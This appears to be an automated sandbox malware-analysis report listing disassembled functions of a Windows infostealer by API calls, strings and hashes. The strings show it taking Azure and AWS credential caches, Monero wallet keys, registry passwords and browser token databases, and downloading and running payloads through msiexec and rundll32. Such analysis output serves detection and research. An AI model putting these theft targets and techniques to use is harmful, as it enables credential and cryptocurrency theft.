                      • Instruction ID: 5f027da8d48f2b226d31bc67069dcf9c0714fc69fc6f5d30155e3e4d9f0f6b2d
                      • Opcode Fuzzy Hash: 7a8ede868600eee862778e03682a5b7470c61edd26432a33d519d3d5e861663a
                      • Instruction Fuzzy Hash: 8DE1ECB280014CABDB18EFA0DC95FEE77B8AF54340F045179F20A7B195DE706A4ACB65
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      • RegOpenKeyExA.ADVAPI32(00000000,01689E40,00000000,00020019,00000000,00F005B6), ref: 00EF83A4
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EF8426
                      • wsprintfA.USER32 ref: 00EF8459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00EF847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF8499
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Similarity
                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                      • String ID: - $%s\%s$?
                      • API String ID: 3246050789-3278919252
                      • Opcode ID: 081051af444ff4dc93df982202f429ebe61a7da2faaadef809c55a0a4cc084a0
                      • Instruction ID: dcbe1e534cbb92462afadaeecba547be107d966e5f041ebf3108b31d3aff6036
                      • Opcode Fuzzy Hash: 081051af444ff4dc93df982202f429ebe61a7da2faaadef809c55a0a4cc084a0
                      • Instruction Fuzzy Hash: E7810CB191011CABDB28DF54DD95FEAB7B8FF48700F0086A9E209A6180DF716B85CF94
                      APIs
                        • Part of subcall function 00EF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EF8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF4DB0
                      • lstrcat.KERNEL32(?,\.azure\), ref: 00EF4DCD
                        • Part of subcall function 00EF4910: wsprintfA.USER32 ref: 00EF492C
                        • Part of subcall function 00EF4910: FindFirstFileA.KERNEL32(?,?), ref: 00EF4943
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF4E3C
                      • lstrcat.KERNEL32(?,\.aws\), ref: 00EF4E59
                        • Part of subcall function 00EF4910: StrCmpCA.SHLWAPI(?,00F00FDC), ref: 00EF4971
                        • Part of subcall function 00EF4910: StrCmpCA.SHLWAPI(?,00F00FE0), ref: 00EF4987
                        • Part of subcall function 00EF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00EF4B7D
                        • Part of subcall function 00EF4910: FindClose.KERNEL32(000000FF), ref: 00EF4B92
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF4EC8
                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00EF4EE5
                        • Part of subcall function 00EF4910: wsprintfA.USER32 ref: 00EF49B0
                        • Part of subcall function 00EF4910: StrCmpCA.SHLWAPI(?,00F008D2), ref: 00EF49C5
                        • Part of subcall function 00EF4910: wsprintfA.USER32 ref: 00EF49E2
                        • Part of subcall function 00EF4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00EF4A1E
                        • Part of subcall function 00EF4910: lstrcat.KERNEL32(?,0168E460), ref: 00EF4A4A
                        • Part of subcall function 00EF4910: lstrcat.KERNEL32(?,00F00FF8), ref: 00EF4A5C
                        • Part of subcall function 00EF4910: lstrcat.KERNEL32(?,?), ref: 00EF4A70
                        • Part of subcall function 00EF4910: lstrcat.KERNEL32(?,00F00FFC), ref: 00EF4A82
                        • Part of subcall function 00EF4910: lstrcat.KERNEL32(?,?), ref: 00EF4A96
                        • Part of subcall function 00EF4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00EF4AAC
                        • Part of subcall function 00EF4910: DeleteFileA.KERNEL32(?), ref: 00EF4B31
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Similarity
                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                      • API String ID: 949356159-974132213
                      • Opcode ID: e1c389ceece71f50251384181427c38f592769c47c3be64d44edddbf5055a39c
                      • Instruction ID: 3bee1630c4f8590944354162279747bfe2335ffe09ea4f1a66ca6a50df3a8d7e
                      • Opcode Fuzzy Hash: e1c389ceece71f50251384181427c38f592769c47c3be64d44edddbf5055a39c
                      • Instruction Fuzzy Hash: FF4183BA94030867DB24F770EC47FED7678AF64700F0044A4B289660C1EEF59BD99B92
                      APIs
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00EF906C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Similarity
                      • API ID: CreateGlobalStream
                      • String ID: image/jpeg
                      • API String ID: 2244384528-3785015651
                      • Opcode ID: 67f7723a1a040afb8c0a97609aa00a90f45f53b5efb2637d453d13de471266bd
                      • Instruction ID: bbb50a3eb6f36ac1686bbb2f0060e6a4f1647c80f2a490682ff54e885c0292b6
                      • Opcode Fuzzy Hash: 67f7723a1a040afb8c0a97609aa00a90f45f53b5efb2637d453d13de471266bd
                      • Instruction Fuzzy Hash: 1A710175910208FBDB28DFE4E889FEDB7B9BF48700F108518F616A7284DB74A945CB60
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00EF31C5
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00EF335D
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00EF34EA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Similarity
                      • API ID: ExecuteShell$lstrcpy
                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                      • API String ID: 2507796910-3625054190
                      • Opcode ID: 550661f285626adb27c307e6d7b882bde1907d8c89c62a8eb31c1f89a9e98841
                      • Instruction ID: 952829830dca00f4791c9b7d6a55704bd746abc970877d0efa2602c2b10f40d7
                      • Opcode Fuzzy Hash: 550661f285626adb27c307e6d7b882bde1907d8c89c62a8eb31c1f89a9e98841
                      • Instruction Fuzzy Hash: 07121FB180010CAADB18EFA0DC56FFDB7B8AF54340F545179E60A7A095EF706B4ACB52
                      APIs
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EE6280: InternetOpenA.WININET(00F00DFE,00000001,00000000,00000000,00000000), ref: 00EE62E1
                        • Part of subcall function 00EE6280: StrCmpCA.SHLWAPI(?,0168E470), ref: 00EE6303
                        • Part of subcall function 00EE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EE6335
                        • Part of subcall function 00EE6280: HttpOpenRequestA.WININET(00000000,GET,?,0168DA40,00000000,00000000,00400100,00000000), ref: 00EE6385
                        • Part of subcall function 00EE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EE63BF
                        • Part of subcall function 00EE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EE63D1
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EF5318
                      • lstrlen.KERNEL32(00000000), ref: 00EF532F
                        • Part of subcall function 00EF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EF8E52
                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00EF5364
                      • lstrlen.KERNEL32(00000000), ref: 00EF5383
                      • lstrlen.KERNEL32(00000000), ref: 00EF53AE
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Similarity
                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 3240024479-1526165396
                      • Opcode ID: 382f21812c7a21fef6e25d74e9fe4a07a97541997fd49cd552a6ba9da15632c2
                      • Instruction ID: b7c419538bb55e8cef45e4cf86fbdb4e3104145853aeb6a8b2520c39e0fc2a32
                      • Opcode Fuzzy Hash: 382f21812c7a21fef6e25d74e9fe4a07a97541997fd49cd552a6ba9da15632c2
                      • Instruction Fuzzy Hash: B1512EB191014C9BCB18FF60C996AFD77B8AF50340F549028FA0A7B591DF706B45DB62
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Similarity
                      • API ID: lstrcpylstrlen
                      • String ID:
                      • API String ID: 2001356338-0
                      • Opcode ID: bb94d4480768147623824e2e49cc0b15c0ede54d82dada9ee01646e440c81a26
                      • Instruction ID: 0f95517c5b491286563dc87161fab29e35e22ee92b69fb09f918e75c3d535f40
                      • Opcode Fuzzy Hash: bb94d4480768147623824e2e49cc0b15c0ede54d82dada9ee01646e440c81a26
                      • Instruction Fuzzy Hash: D9C185B590011DABCB28EF60DC89FFA73B8BF54304F0455E9E20E67141EA71AA95CF91
                      APIs
                        • Part of subcall function 00EF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EF8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF42EC
                      • lstrcat.KERNEL32(?,0168DFF8), ref: 00EF430B
                      • lstrcat.KERNEL32(?,?), ref: 00EF431F
                      • lstrcat.KERNEL32(?,0168C690), ref: 00EF4333
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EF8D90: GetFileAttributesA.KERNEL32(00000000,?,00EE1B54,?,?,00F0564C,?,?,00F00E1F), ref: 00EF8D9F
                        • Part of subcall function 00EE9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EE9D39
                        • Part of subcall function 00EE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE99EC
                        • Part of subcall function 00EE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EE9A11
                        • Part of subcall function 00EE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EE9A31
                        • Part of subcall function 00EE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EE148F,00000000), ref: 00EE9A5A
                        • Part of subcall function 00EE99C0: LocalFree.KERNEL32(00EE148F), ref: 00EE9A90
                        • Part of subcall function 00EE99C0: CloseHandle.KERNEL32(000000FF), ref: 00EE9A9A
                        • Part of subcall function 00EF93C0: GlobalAlloc.KERNEL32(00000000,00EF43DD,00EF43DD), ref: 00EF93D3
                      • StrStrA.SHLWAPI(?,0168DEC0), ref: 00EF43F3
                      • GlobalFree.KERNEL32(?), ref: 00EF4512
                        • Part of subcall function 00EE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EE9AEF
                        • Part of subcall function 00EE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00EE4EEE,00000000,?), ref: 00EE9B01
                        • Part of subcall function 00EE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EE9B2A
                        • Part of subcall function 00EE9AC0: LocalFree.KERNEL32(?,?,?,?,00EE4EEE,00000000,?), ref: 00EE9B3F
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF44A3
                      • StrCmpCA.SHLWAPI(?,00F008D1), ref: 00EF44C0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 00EF44D2
                      • lstrcat.KERNEL32(00000000,?), ref: 00EF44E5
                      • lstrcat.KERNEL32(00000000,00F00FB8), ref: 00EF44F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Similarity
                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                      • String ID:
                      • API String ID: 3541710228-0
                      • Opcode ID: e831814ee10e0251e8c2353a40e4a99f744a63bf4d3c82b5805e0ebeb0c39c1c
                      • Instruction ID: e421a2fc3e99daf7c84824fb1df37da2a75c9eaa6acc33e69c0fe95f0440c8cd
                      • Opcode Fuzzy Hash: e831814ee10e0251e8c2353a40e4a99f744a63bf4d3c82b5805e0ebeb0c39c1c
                      • Instruction Fuzzy Hash: C27147B690020CB7CB24EBA0DC85FEE77B9AF88300F045598F619A7185EA74DB55CB91
                      APIs
                        • Part of subcall function 00EE12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EE12B4
                        • Part of subcall function 00EE12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00EE12BB
                        • Part of subcall function 00EE12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EE12D7
                        • Part of subcall function 00EE12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EE12F5
                        • Part of subcall function 00EE12A0: RegCloseKey.ADVAPI32(?), ref: 00EE12FF
                      • lstrcat.KERNEL32(?,00000000), ref: 00EE134F
                      • lstrlen.KERNEL32(?), ref: 00EE135C
                      • lstrcat.KERNEL32(?,.keys), ref: 00EE1377
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EF8B60: GetSystemTime.KERNEL32(00F00E1A,0168C928,00F005AE,?,?,00EE13F9,?,0000001A,00F00E1A,00000000,?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EF8B86
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00EE1465
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE99EC
                        • Part of subcall function 00EE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EE9A11
                        • Part of subcall function 00EE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EE9A31
                        • Part of subcall function 00EE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EE148F,00000000), ref: 00EE9A5A
                        • Part of subcall function 00EE99C0: LocalFree.KERNEL32(00EE148F), ref: 00EE9A90
                        • Part of subcall function 00EE99C0: CloseHandle.KERNEL32(000000FF), ref: 00EE9A9A
                      • DeleteFileA.KERNEL32(00000000), ref: 00EE14EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                      • API String ID: 3478931302-218353709
                      • Opcode ID: 3db73696a35b5f96711ece0cc29553301bff731ae23b7cde04ffa41d4d50d4e1
                      • Instruction ID: e5a0b4dc9ee31b78d4dc98b05686d3c7ac16729d4ce4d8d3763a36962c9f94e9
                      • Opcode Fuzzy Hash: 3db73696a35b5f96711ece0cc29553301bff731ae23b7cde04ffa41d4d50d4e1
                      • Instruction Fuzzy Hash: 605131F191011D57CB29EB60DD96AFD73BCAF54300F4451B8B70A76082EE706B89CBA6
                      APIs
                        • Part of subcall function 00EE72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EE733A
                        • Part of subcall function 00EE72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EE73B1
                        • Part of subcall function 00EE72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EE740D
                        • Part of subcall function 00EE72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00EE7452
                        • Part of subcall function 00EE72D0: HeapFree.KERNEL32(00000000), ref: 00EE7459
                      • lstrcat.KERNEL32(00000000,00F017FC), ref: 00EE7606
                      • lstrcat.KERNEL32(00000000,00000000), ref: 00EE7648
                      • lstrcat.KERNEL32(00000000, : ), ref: 00EE765A
                      • lstrcat.KERNEL32(00000000,00000000), ref: 00EE768F
                      • lstrcat.KERNEL32(00000000,00F01804), ref: 00EE76A0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 00EE76D3
                      • lstrcat.KERNEL32(00000000,00F01808), ref: 00EE76ED
                      • task.LIBCPMTD ref: 00EE76FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                      • String ID: :
                      • API String ID: 2677904052-3653984579
                      • Opcode ID: 64827bc4bf517b33b797283991c6a0ad0a12c672f337575b2b49d89dc6d889dd
                      • Instruction ID: c0ccb7b8d1af69d2569df8388f2d4034123bc843f05cad55c5e6babf537f9538
                      • Opcode Fuzzy Hash: 64827bc4bf517b33b797283991c6a0ad0a12c672f337575b2b49d89dc6d889dd
                      • Instruction Fuzzy Hash: 0731387690014DEFCB2CEFA5EC85DFE77B8BF44302B105128E116B7284DA34A996DB51
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0168DBD8,00000000,?,00F00E2C,00000000,?,00000000), ref: 00EF8130
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF8137
                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00EF8158
                      • __aulldiv.LIBCMT ref: 00EF8172
                      • __aulldiv.LIBCMT ref: 00EF8180
                      • wsprintfA.USER32 ref: 00EF81AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                      • String ID: %d MB$@
                      • API String ID: 2774356765-3474575989
                      • Opcode ID: 03d5b3e13533ae5a840144bca5c6d09bce71ee6526a1c1562c294f4da37d6250
                      • Instruction ID: 7625cccbcdad741bf49c2794933d9574cc5efe9fc9ca8b97959dab3f8e6b419d
                      • Opcode Fuzzy Hash: 03d5b3e13533ae5a840144bca5c6d09bce71ee6526a1c1562c294f4da37d6250
                      • Instruction Fuzzy Hash: 802127B1A4420CABDB14DFD4DD49FAEBBB8EB44B00F104219F715BB284D7B869018BA5
                      APIs
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EE4839
                        • Part of subcall function 00EE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EE4849
                      • InternetOpenA.WININET(00F00DF7,00000001,00000000,00000000,00000000), ref: 00EE610F
                      • StrCmpCA.SHLWAPI(?,0168E470), ref: 00EE6147
                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00EE618F
                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00EE61B3
                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00EE61DC
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00EE620A
                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00EE6249
                      • InternetCloseHandle.WININET(?), ref: 00EE6253
                      • InternetCloseHandle.WININET(00000000), ref: 00EE6260
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                      • String ID:
                      • API String ID: 2507841554-0
                      • Opcode ID: c42068cb8608bbbca9506fce691aeb70267c4af669b95a61924ed28735e145d6
                      • Instruction ID: 6e2c2ac89f569e7e2f494aae1892872294a3df3e61e171a83f84ba6db1f7a405
                      • Opcode Fuzzy Hash: c42068cb8608bbbca9506fce691aeb70267c4af669b95a61924ed28735e145d6
                      • Instruction Fuzzy Hash: 96516DB190020CABDB24DF51DC49BEE77B8AB44345F1080A8E709BB180DB756A85CF95
                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EE733A
                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EE73B1
                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EE740D
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00EE7452
                      • HeapFree.KERNEL32(00000000), ref: 00EE7459
                      • task.LIBCPMTD ref: 00EE7555
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$EnumFreeOpenProcessValuetask
                      • String ID: Password
                      • API String ID: 775622407-3434357891
                      • Opcode ID: 0d9d5976909be7277811f740934aa70634c04c08d646abeb30c730eeca852157
                      • Instruction ID: ab96113e8bab28bb4b0721af4f89c2e3731c2ebdde93908edefb79fd4f608c51
                      • Opcode Fuzzy Hash: 0d9d5976909be7277811f740934aa70634c04c08d646abeb30c730eeca852157
                      • Instruction Fuzzy Hash: 39611DB590415C9BDB24DF51DD41BD977B8BF48304F0091E9E689A6181EBB05FC9CFA0
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                      • lstrlen.KERNEL32(00000000), ref: 00EEBC9F
                        • Part of subcall function 00EF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EF8E52
                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 00EEBCCD
                      • lstrlen.KERNEL32(00000000), ref: 00EEBDA5
                      • lstrlen.KERNEL32(00000000), ref: 00EEBDB9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                      • API String ID: 3073930149-1079375795
                      • Opcode ID: 86c23cdb85dbf98bfff1d2b92dc1e4ccbcbe7de55686e8a221b3d3838725b5cd
                      • Instruction ID: 84007ad4197b70b73a45ccd08aefdfb1df200c35bc53fc67cd69499325fe4856
                      • Opcode Fuzzy Hash: 86c23cdb85dbf98bfff1d2b92dc1e4ccbcbe7de55686e8a221b3d3838725b5cd
                      • Instruction Fuzzy Hash: 6CB145B291014CABDB18FBA0DC56DFE73B8AF54300F445178F60AB6095EF746A49CB62
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess$DefaultLangUser
                      • String ID: *
                      • API String ID: 1494266314-163128923
                      • Opcode ID: 233014239fb03014b34dc1b438372cc6b2edea4beeab9d33d60cc607d15daf33
                      • Instruction ID: efc8881426c2115bd1fcfc745dade9e78f94488f319b99238feee0af88335bc3
                      • Opcode Fuzzy Hash: 233014239fb03014b34dc1b438372cc6b2edea4beeab9d33d60cc607d15daf33
                      • Instruction Fuzzy Hash: 8BF03A30904209FFD368AFE0B50972CBB74FF14707F0401A9E61AD76C4E6714AA19B99
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EE4FCA
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EE4FD1
                      • InternetOpenA.WININET(00F00DDF,00000000,00000000,00000000,00000000), ref: 00EE4FEA
                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00EE5011
                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00EE5041
                      • InternetCloseHandle.WININET(?), ref: 00EE50B9
                      • InternetCloseHandle.WININET(?), ref: 00EE50C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                      • String ID:
                      • API String ID: 3066467675-0
                      • Opcode ID: 8fc7f19e670bc0240baccee4a0abba4cd570ba9991402ef5e00ca009233a4414
                      • Instruction ID: e54bb1707ac8f0d5af2b6034610963786390f05e36c404427d95310fa261ed6f
                      • Opcode Fuzzy Hash: 8fc7f19e670bc0240baccee4a0abba4cd570ba9991402ef5e00ca009233a4414
                      • Instruction Fuzzy Hash: DF31E7B5A0021CABDB24CF54DC85BD9B7B5EB48704F1081E9F709A7285D6706EC58F98
                      APIs
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EF8426
                      • wsprintfA.USER32 ref: 00EF8459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00EF847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF8499
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                      • RegQueryValueExA.ADVAPI32(00000000,0168DC98,00000000,000F003F,?,00000400), ref: 00EF84EC
                      • lstrlen.KERNEL32(?), ref: 00EF8501
                      • RegQueryValueExA.ADVAPI32(00000000,0168DC80,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00F00B34), ref: 00EF8599
                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF8608
                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF861A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
